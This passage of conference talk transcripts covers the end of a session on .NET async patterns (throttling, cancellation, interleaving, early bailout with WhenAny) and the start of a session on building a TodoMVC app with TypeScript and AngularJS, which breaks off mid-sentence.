you to obviously hear all the different tracks off the four track album, is we're going to play a different track. We're going to play track four, realistically. We're going to play the last Flack track to prove that you can actually play a Flack track. So copy task is completed. And the real point is I've missed a line. This is where I am going to nick a bit of code for you. Because I can just see myself overrunning. And we really want to see all the types. So what we're going to say is, oh, yeah. I have to go one down, though. I need to show you the one at the top. So what we're going to do is we're going to take our list of all the tasks. And we're saying, if there is still stuff to do, and that's what this line is, if we still have some tasks that need processing, because we have tasks in this list, then wait for the first one to come back. First one. The moment you say when any, you start running all those tasks in the background. Now, there's only four in there, because we made sure we only put four in at the very start. We then say, if it completed, because it could fault, it could have other things happen, so we're going to check it's completed. Then we remove it from our list of tasks. It's quite cool. This list of tasks, because we know it's finished now, so we don't need any more. We then say, hey. So we had a copy task list of four tasks, four file names. One of them's finished. We remove that task and get rid of it. We then get to see if we've got any more files to copy. We have got more files to copy. Create a new task. In we go. That's going to annoy me. Right, good. What we're going to do is create a new task. We had four, one finished. We had three. We still got file names. We're going to create another one and go back to four. So that's what we did. Then we say, by the way, if it's flat, we called it so that we can play this very last track, which we know is a flat file. Then when we get that, we're going to play that audio track. It was last flat file copied. It's the one we're going to use. We just trip that off and actually compile. So what we're looking at is we start with 21 files that we're going to copy. We put four of them in an array. We get one of them to finish. We put one back. Finishes, put one back. Finishes, put one back. This happens quite a lot. Until we've got all 21 files have been processed into at least what got in there. Then it goes three, two, one, finished. And the while loop ends. And then we can deal with it. So what does that look like in terms of what our file system is going to do? Well, what's going to happen is we should get four temp files at a time. So we haven't got that big list of all these temp files. We're now only copying four at a time. And they're gradually going through and possibly stopping dead, which is unusual. How much on it that's an exception about to fire? That's interesting. Really interesting thing is when I was playing with this the other day, because we now have Git integration inside of VS 2013, it was watching files and locking them. It's great because he hadn't versioned them, but it got a handle on them. Let's have another game. So we're copying four at a time. They should be appearing. Four at a time. Yeah. I wonder what happened. And there you are. And then it finally starts playing the last file. So that's throttling. That's very quickly allowing you to say, hey, I only want four things to happen at once. Now, yes. Was that a pretty amount of code? Realistically no. But it wasn't a lot of code. It's not hard to put that in. A load of this code, to be honest, is to do with UI stuff. And it's much more simple if you didn't have the UI, really. So this is a really fantastically easy way to do that situation where you're going to throttle. We're going to do four, five, six things at once, and we don't want any more than that to happen. If any of those tasks, by the way, faulted, had an exception, it would come back. We could handle that exception, throw another task in, and keep going if you wanted to just process everything. The other thing that happens is someone normally, one of the questions is, when the first one comes back, what if while you're waiting and then you do an await when any, one of those tasks that was still in there has finished? Well, it just pulls the next one off that's finished. Straight away. It doesn't even kind of really wait for them to get going. It just kind of goes, right, okay, have that, have that. So solves all that kind of thing. Redundancy. Now, this is the one where you thought this is how when any was always going to work. It's the first one wins and comes back. So, you know, that's really good because that's the stock price. It's a geo lookup, that kind of thing. This is much easier. I mean, much easier. Let's just close down a bit. I'm still running. Get out of the debugger. So when any first wins, let's copy that in and open the file. So what's behind this button? Well, we're going to put this behind this button. This is a world of cut and paste because I was too lazy to simplify it. Right. I just cut and paste and do the third track. Flack, AAC, OGG, M4A. Don't care, just copy them. Just copy them. And the first one that comes through, we're fine. Just go with it because this is the one where I don't care what the quality is. I just would like to get it as fast as possible. So that's which BitTorrent site has managed to download the latest episode of Game of Thrones. That's the one that I'll do. That kind of thing. So if we run that, we should see a nice, let it get going. I should see that folder get emptied. Going to do a simple thing where we go when any first wins, copies all the files, starts playing one of them. There. Now the interesting bit about this, if you've noticed, is how many files did it copy? Four. Which? And that's interesting because I didn't care. I just wanted the first one, but it kind of carried on doing all the tasks for me. So now there's two views on this is, I don't want it to carry on doing the tasks. I'd like it to cancel all the other tasks and get rid of them. The other one is, in finance, when you're looking at share prices, is I want all the tasks to complete when I'm looking at the share price, from a market maker, because we pay them for looking at the share price, and if we don't complete the call, we can't record the transaction number, put it in the audit trail and then reconcile the accounts. So this is not stupid that it allows all the tasks to finish. But it may not be what you want. But that's great. Or it's fine, because, and boy said, because they're using the task parallel library, and because we are returning task of type string, we have cancellation support built in. Right. So this is going to make life easy. So all we need to do is that boilerplate code that we did have, we're going to do a cancellation token source. I am going to increase the... You're right. Sorry about that, because I closed the window, it reset to 100%. So we have a cancellation token source. You'll notice we've got red lines all over this, and that's because we haven't actually designed copy file sync to support cancellation. Cancellation token source is not a magic bullet. I cannot just say, I have a cancellation token source, whoa, put it on this task, I'll cancel, and it will do everything for me. It's not going to. You need the async method that you're going to call to support cancellation. That's quite important. So I said earlier that once you've used async once, it tends to litter your code down the call stack. Once you've used a cancellation token, it will probably litter your code with cancellation tokens being passed all the way down the call stack. The point I once had a developer say, I'll copy that bit of coding. I ought to do that. So we have copy file async. We have the version that, and it's just an overload we're going to have. So don't worry, it will go bigger in a second. Mm-hmm. So there's the async, the normal version, and here's the one with cancellation, and we'll walk through that and tidy it up. Yes. Right. So one developer said, I'd like to just throw a cancellation token, go cancel, and everything just stops. And I said, that's great. The.NET framework must be getting really intelligent because it knows whether you're in the middle of doing something serious, like a transaction or halfway opening a file and knows how to clean it all up and knows better than you what you intended to do. And the problem is it doesn't. It doesn't know what to do if you get cancelled. Because it can't. It doesn't know what you're doing. It didn't know realistically what the aim of that file copy is. It might not matter if you stop halfway through. It might be quite critical if you stop halfway through. So really, you can't do that. So that's why you have this concept of cancellation tokens that you hand to your async methods. And the async method, when it's cancelled, says, this is what I do when I get cancelled. These are the actions I have to take. If you didn't use a cancellation token, you could probably get the thread process and just kill it. But that's like Task Manager finishing Outlook, which you have to do regularly. But, you know, it's one of those things you don't want to do. If you write your own code, you can build all this in. So we pass in a cancellation token. Cancellation tokens are really simple things. They are in the Task Parallel Library. You have a cancellation token source. You create that new. That immediately creates a singleton of a cancellation token that's thread safe that you can hand to multiple threads. So that's good. The reason it works is because the source stream copied to async supports a cancellation token. If someone in the.NET framework wrote an async method that doesn't support cancellation, you're stuffed. At this point, for the await side of things. You can spot it at other points. You could spot it in your loop. But realistically, this isn't a loop. That's the one copy that's happening. So fortunately, they support cancellation. And how does cancellation work? It throws an exception in your code. So that may horrify you that it throws exceptions. Exceptions are like nulls in databases. The older you get, the more you like them, and the more you think they're a good thing and not a bad thing. Just because it makes it slightly harder to program doesn't mean they're bad. Importantly, what we're going to do, well, unimportantly, we fiddle with the UI to make it look pretty. But more importantly, we are going to check if we have a temp file. And if we have a temp file, because we've just copied that file, it was in the middle of copying this file, we'll delete it. So this is where, if it had just killed the process, we'd have TMP files all over the place, which is really messy. So this cleans it up for us. So this is basically going to copy four files. The first one wins, and it will cancel the rest, and they won't get copied. And even if they're halfway through, it will clean up. I should have checked that that built properly. And it did. Good. So when any first. So it's first wins, and it should clean up. So we only have one file at the end. Yes. And there we are. And if I run it again... Yeah, I haven't cleared down the files properly. That's annoying. See, this is the problem with async. You better make sure you're not still doing things in the background. I will check that we do the cancellation. Yeah, it should cancel that down. And there you are. That was me. When I copied that code in, no one screamed. You didn't clear down the previous run. And this is actually a valid... I kind of, you know, it's never great when actually things don't go quite right. But it's a good example of how you have to think about this. In general, you disable the button so you can't click it twice. That's the easiest way of doing it. That's not necessarily, you know, a nicer way is clearing it down, stopping it playing and restarting it all. So let's see that in action again. So now, that's why I put all that protection code in. So we can see it's got the org file again, because that was the smallest, so clearly that was going to win. This is where it's not going to do it for me. Go on, go on. I'm trying to generate a very weird edge case that's hard on an SSD to do, because it keeps copying them really fast. It's about one in 20 times. That's the annoying bit. Go on. It's not going to do it. Ah. What you will find if you click this enough and you have a system that's marginal and somehow can get away with this, they may have improved the compiling in 2013 from 2012, but I doubt it. What occasionally you get over here is you see the org file and the MP4 file, because they're virtually the same size. And when you hit the cancellation, in between you hitting the cancellation token to say, cancel, and it raising it, it finished copying the file. And our canceling exception only deletes TMP files. So that's an example of you've got to start thinking, we're multi-threaded. This is a bit of a pain at times. So you have to be a bit defensive on how you do things, like clear up, like handle all this kind of stuff. So, well, that's cool, because we did first one, one. We deleted them all off, and we saved on network bandwidth, people were doing network bandwidth and things like that. Interleaving, your browser does this all the time. You know, it does not download a web page, one item at a time, until you embed some JavaScript in your CSS page, and then it can really screw your page load up. I tell you now. There's certain times when it will start downloading one item at a time before it renders your page, and you want to avoid that, but in general, if there's a load of images on a web page, it will download them all in the background separately, and it will start showing you to them, showing them to you, possibly out of order. And the page has that little kind of dance after half a second, where it looks like crap, and then goes, right, that's what I was meant to look at, now I've got the CSS file, and then it's cached, and it all looks fine the next time. So that little jiggle. So we can do that with when any. We've got that ability to kind of do this interleaving. So the idea here is we have some task that we've got. Do, delete, there. We have some task which is long running, but we have some menial task that once a single task is finished, we can execute like that. So there's no point doing a wait on it, because it's really fast. Why await something that can execute in like 10 milliseconds, no point, might as well just do it. So what we're doing is getting all those file names to copy again. We're creating a load of tasks to copy. Going through, doing this when any. Again, it's this concurrent thing. No, it isn't in this, we're just asking it to do it. And what it's going to do is every time it's downloaded a file, we're going to check the MD5. MD5 is just to check some. So in the case of music files, they give you an MD5 generally, so you can check that the music file delivered from Warner Brothers is actually correct, and that we've got the right content, which is a nice thing to do, because unbelievably, FTP is not the most reliable protocol in the world at times, and can get corrupted. Or they can copy the wrong files into a folder with the wrong MD5s, which is even more the problem. So interleaving, we've got some heavy IO process, and all we're going to do is do these MD5s in the meantime. So while they're all copying, we could do this MD5, we didn't really hold much CPU time up. We've managed to check these as we went along, and we ended with a file, music being played. And you think, well, that's kind of good, you know, interleaving. But in my example I just gave, what would happen if an MD5 is incorrect? You wouldn't want to carry on downloading. So this is the real advantage of that interleaving, is early bailout. So if you are downloading 20 tracks from an album from Warner Brothers to sell in your music, online music shop, if you have one track that isn't there, that's corrupted, you don't sell the album, and there is virtually no point putting it in the encoding process. If you haven't got the original file, don't bother. Again, a great developer, an innocent young child, who you know, Scott, said, but surely we could sell the 19 tracks that are okay. If you look at the legal contract, that's it. For a record company, you don't go around selling the single tracks. If you're meant to be selling the album, that's a kind of joint deal that you get the album, and you get the single tracks, and you're really meant to tell them if you haven't got the data. So, in that sense. So, while in the real world, it might be interesting to do that. In the theoretical world, we could survive one of those tracks not arriving in the real world. We want to stop and get out of there. And the code for that's nice and easy, because you saw we had cancellation. So we're building on that. We had cancellation. We had interleaving. So now all we need to do is say, hey, if we get invalid, so this is the standard thing we're just doing. We're interleaving. But this time, we're saying, if we have an invalid MD5, we are going to cancel all our tasks and stop copying files, because we don't want this data. It's dead to me. So, let's build that. So it's quite nice. The cancellation was with first any. That allowed us to clear up. Now we're using cancellation with interleaving. That allows us to do early bailout. All this is using stuff. If anyone had done the TPL, this is quite familiar. It's using tasks. It's using cancellation tokens. So, what I can do is run that. We're going to see a load of files come through. Clearly, this is going to work, I think, because all the MD5s are correct. Yeah. Looks like, yeah, they're all valid. So, what I really need to do is edit one of these MD5s. So, let's edit one. If you ever wondered what an MD5 looks like, it should be in here somewhere. Of course, it's not. Let's go and get... into the AAC. We're going to edit one of these MD5s. It's just a random hash of numbers. We're going to edit one of them. Numbers and letters. We'll edit it. It now won't work. So, we can look at that folder. So, we are now going to do it, and we should have a failure of an MD5, and we get to be played the track that had the problem, so we can see what's wrong with it. And it should bail out and stop copying files for us. What a shame. You got Rick Rolls. Never mind. That is a pretty sackable offence for a speaker to still be Rick Rolling people. But, yeah, the keen eye amongst you there would see that I played audio track with a lowercase t, not an uppercase t, and that goes to a method that lies and just plays Rick Ricks. But that's great, because we can actually cancel out and stop doing things because something went wrong. So, resources for this talk. The parallel team blog, whenever they're doing something interesting, they shove it up there, and that's where you'd find out about white papers. That white paper is two and a half years old. Shame on you for not reading it, because it actually is quite useful for this. And the BCL package is available as well for those with server deployments that won't allow 4.5. Not that many now. I think we're gradually getting to the point where it is all on there. Those BCLs actually help if you're doing Windows Phone Development and things like that, which aren't on 4.5. All the code and slides are available at GitHub, Wesley L, search for the repo to do with async patterns. Tomorrow, I'm doing Actors, so there is two NDC Oslo repos up there. So, if you want to get me on Twitter, it's Wesley L. I promise I talk about drinking an IT on that, not food. I have Wesley Jam for food and family stuff and gardening, so you do get a pure IT feed. You can email me at any point. I'll mention Huddle again, because Huddle pay me to do things like that, as in they don't make me take holiday to come to a conference, which is quite cool of them. We have jobs, QA, devs. If you're going to go for a job at Huddle, please talk to me first, because there's a signing on bonus, clearly. And I promise we will share a chunk of that Michelin-starred restaurant in London once you're through your preparation, so we will enjoy that bonus if it happens. And that's it. Any questions? Wow. Yes? When the IT came that I had the government for open-vice, I had a presentation about it, but I remember some warning that if you're running a web application on an IAS server, you should threat heavily, and spinning a lot of the ITs in the methodology by issuing up new threats. You should be very careful about using a way-tasting on an IAS server, and yes, you should, because you cannot just run up lots of threads willy-nilly. The point about these threads that you've seen is there's no more thread than the process that was running them. These are IO completion in the background. Therefore, all the things you've seen today realistically run on one thread. That was the UI thread. So all it was doing was allowing the IO to complete in the background, and sign up delegates, callbacks. That's quite safe. Creating a load of threads from a thread pool, slamming them into a when-all in the middle of an ASP.NET page, is asking for trouble, because you're going to have a hard job reconciling it, especially as the page lifetime means it disappears before you can clean up. And then you're all into that mess, that world of pain. So I think you were right to be warned about being cautious about using a way async liberally in your ASP.NET pages. Now this, as I said, is a good question, because this is virtually single-threaded. If you want to do proper multi-threaded processing, you really need to come to a talk about the actor-based pattern tomorrow on TPL Dataflow. And that's when we'll take code and actually make it run on multiple threads and actually have complicated pipelines of processing, all with a handy NuGet package. And it makes certain things that you thought about, a way async, you go, this is much easier in Dataflow if you're doing that kind of processing. So it would have been wonderful when we were doing MP3 encoding to have Dataflow, because it would have made our life so much easier. So that's tomorrow. I think it's second talk of the day, and I'll be presenting on that. Okay? Another question? One question about the... If I fire up a lot of tasks and wait for them here, and they finish with an exception when I cancel them, creating an exception is quite resource-intensive, and then if I create a lot of exceptions, will it just... There's a real myth, I would say, there's a myth that exceptions are really expensive in, like.net. Yeah, I know what you mean. But if you're doing an exception, your machine seems to grind to a halt as it dumps a stack trace out, builds it all, gets all the marshalling on it. Remember that exceptions are exceptional? They really shouldn't be happening that often. The cancellation exception is lightweight, it's not going to cause the damage you think it's going to cause. And when you get exceptions out of tasks, they come as aggregate exceptions, so they all get bundled together. And virtually, it's the first exception generated that causes you the most grief. After that, it tends to be quite fast to do exceptions. And you're already in a situation where you're cancelling it for a good reason. So the loss of time on that cancellation's got to be less than the time of allowing all those tasks to flow through to completion. There must be some reason you're deciding to throw that. The other way of doing it is you can, if you want, monitor the cancellation token, spot if it says it's cancelled, and then cancel out on that. But if you're handing to a.net framework async method with a cancellation token, it's going to throw an exception. And people will expect your code to throw an exception, rather than just silently end. So, you know, it's one of those things, I'm afraid. What you'll find with the data flow is it doesn't throw cancellation exceptions, it drains your tasks really nicely for you. So that actually doesn't throw exceptions, it handles it all internally and it works really nicely for you to see that you're allowing jobs to complete that are multi-threaded. Okay. Thank you very much. Thank you.
The new Async features come along with the very useful WhenAll and WhenAny methods to execute sets of tasks. We will delve into how these work, the effect of exceptions within any individual task and cancellation. This leads to the creation of common patterns such as Redundancy, Interleaving, Throttling and Early Bailout. Given time we'll also get to peek at progress reporting, something that provides the feedback to add further sophistication to these common patterns. Expect overviews of the patterns, followed by lots of code samples so get the latest Visual Studio 2012 RC installed ready for action.
10.5446/50616 (DOI)
Hello. Thanks for coming. My name is Mark Rendell. I am old and I've been writing software for a very long time and when I started it was dumb character terminals and 80 columns and 20 rows and all this sort of thing. And up until a couple of years ago I was one of those people who would say, oh, you can't write any kind of serious application in the browser. You need WPF or Silverlight or something like that. And then I started writing Zudio, which is a browser based toolkit for managing Azure storage so far, more stuff coming soon. And actually the reason I started writing that was because I wanted to be able to fiddle with my blobs from my iPad. I'm sure everyone here has spent some time fiddling with their blobs on their iPad. And I started, oh, I'll learn Objective C and an iPad application. Then I thought, well, why not try and do it as a web app? And so I started out with jQuery and knockout and various other bits and pieces. And then I kind of discovered AngularJS at the same time as TypeScript. And the two of those things put together to someone who had up until that point been mainly a WPF programmer. And actually these two things together are like the data binding dream, the MVVM dream of WPF, but it actually works and it's nice and it's easier than doing it any other way. So I thought I would come and share my joy and glee with the world at large. You're welcome. So TypeScript, has anyone done any TypeScript already? Yeah, a few people. For those who haven't, why the hell not, you idiot. TypeScript is JavaScript++. TypeScript is, it was created by Anders. Anders Halsberg, the C-sharp guy, has got very, very bored while they were writing the Roslin compiler. He couldn't add any new features to C-sharp while they were doing that and so he went off and invented another language in the meantime. And he decided to fix JavaScript because Microsoft with Outlook.com and Office Online and all these sorts of things, they got some big, big JavaScript projects. And it's quite difficult once you get past a certain number of lines of code to keep track of everything and for teams to work together on stuff. So TypeScript is designed to solve that problem. And the things it adds to JavaScript in order to do that, the main one is static typing. Anders likes static typing, therefore we like static typing. And TypeScript adds static typing so you can actually tell the editor and the compiler what type an object is going to be so that it can actually give you decent IntelliSense. And if when you try and compile it, you've tried to pass a string to something that's expecting a customer, then the compiler can go, that's not going to work. It also brings in a bunch of features from ECMAScript 6. So they wanted to add in things like classes and so forth and obviously they needed to come up with a decent syntax for that. And ECMAScript 6 has actually defined a class syntax which is going to be in the next version of JavaScript in the browser. And so the TypeScript team have been tracking the syntax for ECMAScript 6 so that when it's actually released and all the browsers are supporting it, which will be in like six months for Firefox and Chrome and two and a half years for Internet Explorer, they can just say, well, if you're targeting ECMAScript 6, we won't compile the class thing, we'll just leave it in there. The other thing it adds is the compilation step, which there's a lot of discussion in the sort of dynamic versus static and the Ruby guys and whatever that if you've got enough tests, you don't need static typing. But actually you end up writing a lot of tests that could be handled by a compiler if you did have static typing. So whilst having it doesn't mean you don't have to write any tests, I like to think of it as unit test zero. That compiled step, the first thing that has to pass is your first unit test. And so TypeScript gives you that. The static typing is similar to C sharp, similar to some other languages, but it's got some advantages of its own. It supports generics, which is great. You can have generic lists and generic functions and generic classes and generic interfaces. It supports interfaces and it supports them with structural typing. And if you don't know what that is, it's awesome. And I really wish they put it into C sharp. Structural typing says, okay, I've declared an interface and it's got these two properties and this method on it. The compiler should, at compile time, be able to tell whether a class implements an interface without the class needing to say it implements that interface. And that structural typing go does that. Dart, I think, does it. Swift doesn't, which is interesting considering that it's been around for a while. And TypeScript does this as well. The really nice thing about TypeScript doing it is obviously in JavaScript, you throw around anonymous objects quite a lot and an anonymous object in TypeScript can implement an interface and the compiler can tell you if you've done it wrong, which is great when you're passing things like option hashes to jQuery methods and so forth. It also gives you IntelliSense, TM, or code completion in any other editor, which is nice. And the other thing is that when you're writing JavaScript, you're very rarely writing vanilla JavaScript unless you're Rob Ashton, in which case you're not using TypeScript anyway because it offends you. You're now hard coding ASM.js. But for the rest of us who want to use, joke for one person, for the rest of us who want to use jQuery, want to use Angular or Backbone or Knockout or whatever it might be, it's no good us having this statically typed language if we're consuming JavaScript libraries which don't have static types in. So TypeScript gives you definition files, which are.d.ts files. And the best way to think of these is they're like.h files from C or C++. Unless you've never done C or C++, in which case that won't make any sense to you at all. But it's like a file that just says, this is the way things are and the compiler uses it as a reference when it's compiling and the editor can use it as a reference when you're typing, but then it goes away once the thing's actually compiled and you're running it. And when they announced this, people started going off and writing definition files. And this chat Boris Yankov decided he was going to start a repository and he said, everyone send me your definition files and I will curate a collection of canonical definition files for all the different libraries. And me being cynical, I went, that's not going to work. People aren't going to want to hand over their stuff and give you the credit for everything. But if we just pop over to, definitely typed. Quickly, you can tell that I go there a lot. It's the first one I typed git, that's Chrome's first guess. But this is the definitely typed repository. And these are all the definition files that are in there. It goes on for quite some time. There's definition files for pretty much every client side library and also quite a lot of node libraries as well. So you can use this on client side and server side. So the ECMAScript 6 features that they've brought in at the moment is classes and modules. So JavaScript's got various hacky ways of doing modules and ECMAScript 6 has kind of given it a module keyword so that people can just use that instead. And ECMAScript 6 classes, the TC39 committee who create ECMAScript have finally accepted that prototype inheritance is not necessarily something that people can get their heads around. And so they have finally created a class syntax for the next version and that's got methods and inheritance and properties and constructors and all this sort of stuff. They've actually done a really good job of it and that's what TypeScript's class syntax is taken from. And then we get the compilation step where you get syntax and type checking. You can get it to concatenate all your various TypeScript files into one big JavaScript file. And actually the JavaScript that it outputs, you could read it and go that's basically the code I wrote but without the type annotations and the interfaces because most of what it does is subtractive. It takes away the hints that you've given it. The only thing that is a big change is when you've created a class it creates a kind of the default prototype inheritance and supers and all this sort of thing. It can target ECMAScript 5 or ECMAScript 3. The default is ECMAScript 3. You need that if you want your application to run in IE8. You don't want your application to run in IE8 because it's crippling. It's not just the TypeScript features that you lose. It's also the JavaScript features that you lose like array.forReach for example is not there. If you have got a sufficiently complicated application that it makes sense to build it using AngularJS or TypeScript or both together then you've got a sufficiently complicated application that in my opinion you can go to your users and say IE9 Chrome Firefox or the other one. There are no runtime libraries for TypeScript. It puts a couple of bits of extra code in sometimes if you need something but it doesn't have a big runtime library that you have to download as well. So that's TypeScript. AngularJS. Who's done AngularJS stuff? It's brilliant isn't it? Isn't it the best thing ever? So much better than... That's rubbish. So AngularJS, the team at Google officially described it as a model view whatever framework because the models are plain old JavaScript objects which is nice. The views are plain HTML with some additional attributes and elements in there. And then you've got the whatever and depending on how you're actually writing the Angular and it's quite flexible about this, the whatever might be the scope. That's the kind of minimal unit of whatever that thing is. But you've also got controllers and actually scopes are controlled by controllers so it's a kind of MVC. But then you've also got the fact that you can put the controller onto the scope and then you get something that's a bit like MPVM. And Angular also has services and providers and factories which are three different ways of doing exactly the same thing. And directives which are ways of creating your own web components in a way that is going to become standard once the what 3G, whatever the hell they are, people actually finish the web component specification. So Angular TS. I'm going to jump to code now. As I'm going along, if you are getting lost if I skip over something accidentally then please do shout out. Don't save your questions until the end because I'll have forgotten what I was talking about by the time we get there. So I'm going to go to Visual Studio and I'm going to say File New Project and I'm going to go to Other Languages. This is Visual Studio 2013 update 2 and I have Resharper 8.1 installed. So we'll call this to do MVC demo. What I'm working from here is there's a project run by a few people called to do MVC where they implement the same very small application over and over again using all the different frameworks and every time a new framework comes out, the first thing that you do when you release your framework is make sure you've sent a version of to do MVC based on it to these guys and they can put it in there so you can get React and Backbone. And I've taken the standard JavaScript to do MVC framework and I'm going to rebuild this using Angular and TypeScript and I'm going to whack it up onto GitHub so that you can go and get it and fiddle around with it. So the structure here is that you've basically got an index.html page which has got Angular templates inside it and then we've got our app.js which sets up routing and pulls everything together and we've got two directives. We've got a service. It's actually a factory in here but it'll be a service by the time I finish with it and we've got a controller and then there's some other bits and pieces that we'll just drag in from my cheating folder. So when I create a new TypeScript application because it's still quite a new language, obviously they have to put in some arbitrary rubbish into my TypeScript window there so I'm actually just going to get rid of app.ts altogether. Yes, pneumonia. Does anyone want some? You're sat far enough back, it'll be fine. So right, cheating and let's go back to here and we'll open this up in File Explorer. Put that that side, put that that side and I'm going to drag index.html across there because it's big and complicated and then I'm also going to drag CSS across there because that's got stuff in it that we need as well. I'm going to go back to here, show the hidden files, include that in the project and we'll add a new folder called TS. Right, so what I've got now is an index.html. Up at the top here that data.framework is just part of the to do MVC thing. I'm including my CSS to do MVC.CSS which is there and then down here I've got my body and that's got an ngapp attribute on it and that's saying the top level module for this application is called to do MVC and then we have an ngview element and basically that's it. That's our empty space. If I run this now we'll just get an empty page and if I go to the console here I will get told that nothing has happened at all because we don't have anything in there yet. So I'm going to go to NuGet. I'm going to go to NuGet to get the AngularJS script files. Slowly. Right, when you go to NuGet and try to get AngularJS there are lots of different packages. There's the AngularJS that is maintained by these guys. That's the whole of Angular and it will download everything. But John Papper and some other guys also maintain and Scott Allen and Jeremy Lickness maintain various packages which are the different modules from Angular and that's actually the best way to go because there's a lot of stuff in there that you might not need. Why download it if you're not going to run it? So I'm going to install AngularJS core and AngularJS root and then down here I've got AngularJS.typescript.definitely typed. So every library that's in the definitely typed repository has a NuGet package that is automatically maintained by some kind of continuous integration system. So I'm going to install that as well. There we go. So those have gone into scripts. I've got AngularJS and Angular root and then the definitely typed packages create a typings folder and it's actually brought in jQuery.d.ts as well for reasons that we will go into shortly. So if I run this, let me just check my index.html now if I go down to the bottom so we can see that I need to do MVC common. So let me just open that up. This is shared by all the to do MVC scripts. So let's put that in there as well. And there we go. That's the wrong window. I wish it was possible to theme windows individually. So include to do MVC common in there as well. So now I'm getting to do MVC common and Angular and everything else. So if I just run this now, I'll get a build error. Really? Yes, continue and run the last successful build. Right. So now we've got CSS files are in there and so forth and if I hit the console here, I will see this fail to instantiate module to do MVC because I haven't actually written any code for that yet. So we're going to start off looking at service classes. We're going to do this in a very kind of painful way which now involves me not being able to run the application until we've got to the other end. It's difficult to do it piece by piece without showing you guys the most complicated bit first. And I don't want to do that. I want to ramp up gently. So we'll start off, we'll look at the service class. And those are in there just for the kind of people who ask about the slides afterwards. The notes there. So in the JavaScript, we're using Angular's factory thing to create a to do storage factory which is going to return this anonymous object here with a get function and a put function. Which is kind of, yeah. The way we are going to do this in TypeScript is we're going to go to here and we will add a new TypeScript file. I'm assuming by the way that if anyone can't see the code, they would have shouted by now. So you're all kind of following along quite happily. It could be bigger, could it? There you go. You could sit closer. No, it's not keyboard markets, fonts and colors. Let's try 18. Any better? Yeah. Right. Now, the interesting thing is that I've brought this in. This was... Right. I've brought this in and I've just pasted JavaScript into a TypeScript file and that is valid TypeScript. TypeScript is a super set of JavaScript for the most part, couple of exceptions. But for the most part, you can just pick up and copy and paste some TypeScript, some JavaScript into a TypeScript project and it still works. It's still valid. So the first thing that this is telling me here, this is resharper, is saying this function can be converted into a lambda expression. If I say go on then do that, I'll get resharper telling me it's failed to modify documents. I'm blaming Visual Studio at this point. I expect it'll build now as well. Come on. I'm plugged in. I can do that. Right. So I can convert that to a lambda expression. I don't know about you, but you hear the JavaScript zealots going, oh, it's great because it's a functional language and functional programming. Yay. And I do think for a functional language, you have to write the word function quite a lot. In a functional language, you shouldn't have to do that. You should have to say this isn't a function. Everything that you don't say this isn't a function should be a function. And so we have lambda syntax. And again, this is an ECMAScript 6 syntax. It has this shorthand for declaring functions. I'm going to take out use strict because I don't need it. And then I've got my storage ID to do AngularJS and I've got some functions here. Now, I'm not going to convert those because actually at this point, we want to create a class. So I'm going to create a module to keep it in like that, nice and easy. And then I'm going to export a class and call it to do storage like that. And then I am going to have a constructor. Now, down here, we're seeing that in the JavaScript code, the person who wrote the AngularJS to do MVC thing didn't really do this properly because they've created a to-do storage that isn't unit testable. And Angular is all about being unit testable and TDD-able even though it's dead. And so they create a window service. And so I can say $window here and then I can access the local storage so I can say $window.localstorage. Let me just put this after there. I'll say ng.i-windowservice. Look, IntelliSense, proper IntelliSense. Those are all the interfaces that are declared in the ng module. So now I can say $window.and I can see all the things that are in the window type. The window type is created by Angular so that you can mock it when you are writing tests for your local storage thing. So you can say create an instance of local storage with this object that I've just mocked up or stubbed up which has got a local storage property which has got get item and set item methods and you can test without actually needing to modify your browser's storage. I'm not going to do anything in the constructor though. I'm going to use that window variable in these methods. So I'm going to say public get to declare a method on here and then I can say return json.pass $window.localstorage.getitem.storage.id. Okay. Can't find $window because it's up in the constructor and I haven't put it anywhere. Now what you could do is you could say private $window, colon and all this sort of stuff and then assign it down there. But TypeScript, one of the nice things it's taken from ECMAScript's class syntax is that you can put an access modifier on parameters to your constructor and it will automatically create a field with the same name and the same level of visibility. It is important to note at this point that I am saying the $window member is private. TypeScript will respect that. TypeScript will not let me access that $window member on this class from other TypeScript. Once the TypeScript is compiled and has been turned into JavaScript, it's not private anymore. This has been a cause of some discussion. People have said that there are ways of making it private. The problem is that the ways that there are of making things private in JavaScript objects tend to be quite heavy on memory. It involves creating a lot of closures. It involves creating functions over and over again instead of just once on the prototype. Microsoft has said we'll make it private for TypeScript but it's just public as far as JavaScript is concerned. We're going to put that on there. Then down here we're going to say this. like that. Then that becomes a typed variable. Then we're just going to take this storage out of here and I'm going to put that up there in the module and that makes that show up as well. Then I can just say angular.module.service and put to do storage and to do MVC.toDoStorage. Like that. Okay. So there we go. That's TypeScript. I didn't do the set. Let's just go and grab the set. Is it hot in here or is it just me? Okay. So there we go. I think I've already won at this point just from this class syntax. I think everyone should say, Mark, you're completely right. You don't need to tell us any more but it would be nice for informational purposes. But yes, we've got a class instead of a function. We've got a constructor which automatically creates a private member just by setting a modifier on the parameter name and we've got two methods declared in the way that one might expect to declare methods. Now I've put public on the start of these methods. That's actually optional in the same way that in C sharp, if you don't say private, if you just say void something, then that function is automatically private but actually most coding standards say please be explicit. It's better to have private in there. So the public is implicit. If you want it to be private, you put private. If you want it to be public, you don't have to put public but I like being explicit just on general principles. So that's how to do storage class and if I go to my TS folder here and I have hidden files turned on, you can see every time I save that TypeScript file, I've got WebEssentials installed and it compiles it for me. I can actually go into WebEssentials and turn on a split screen view which will show the compile JavaScript on the right hand side of the editor pane. I'm not going to do it here because a man over there complained that he couldn't see the code and it will just make everything ridiculous but when you first start with TypeScript, it's actually quite a handy thing to have. So this is what it generated and you can see this is effectively our class declaration here and we've got a prototype so we're creating it. So it's the standard JavaScript pattern for creating the equivalent of a class. Oh, the other thing that we got in there is a.map file down at the bottom which will come in very handy later when none of this works and I'm in Chrome trying to find out why. Right. So in our service class, we exported it from the to do MVC module. If you don't export something, it's hidden inside the module. So like my storage ID var, I didn't export that so that's held inside the module, keeps it off the global namespace. I exported the class so that I'll be able to use it from other places. I used a field modifier to set window as a private field on that class and I created a couple of methods using nice clean method syntax. Directives. Directives are quite straightforward. Yeah, he lied. I'm not going to go hugely into directives because Scott Allen is doing a talk in the next slot on AngularJS Directives and if you are intending to use AngularJS or if you've just started using AngularJS and are looking to make the most out of it or if you've been using AngularJS for two years but you haven't actually created any directives yet, then you should go to that talk because directives are literally the best thing about Angular. They are completely awesome. I'm going to go over to here and I've got two directives in this project. One is called to do focus and this is a directive that says when a condition is true, set the focus to this input control and there's one called to do escape and that is a escape key handler for an input control. I'm just going to copy these across and we'll look at how we can turn them into TypeScript. I appreciate that what I'm showing you is kind of how to turn JavaScript into TypeScript but it seemed to me to be the best way to highlight the differences and the advantages and so forth. I'm going to create to do 